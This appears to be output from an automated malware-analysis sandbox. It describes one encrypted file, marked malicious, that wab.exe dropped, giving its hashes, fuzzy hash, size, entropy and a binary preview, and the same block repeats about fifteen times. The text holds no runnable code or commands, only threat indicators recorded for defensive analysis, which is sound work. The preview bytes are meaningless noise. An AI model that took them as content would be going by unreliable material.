                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166079
                                                                                Entropy (8bit):7.998976659531756
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kEb/:ZIc0afzkI9WaXNiB3Wp8fla1WBFb
                                                                                MD5:62EBFB17BFAB897CB889A01253404D1C
                                                                                SHA1:0EAB76FF6745071AB7F13BC6132FD28F2E599909
                                                                                SHA-256:383826960D14146599E03D72DC574B6ABAA8C51798EFE174252CDA43DF943D09
                                                                                SHA-512:93420AF33CB4E95F866FD149A9B6921274BBE94C2479DF55B7A9F696746BECF87149006C581EEA2703657B8CBE8A53BA62632D688BD4B4E516FCD408F9AE52B6
                                                                                Malicious:true
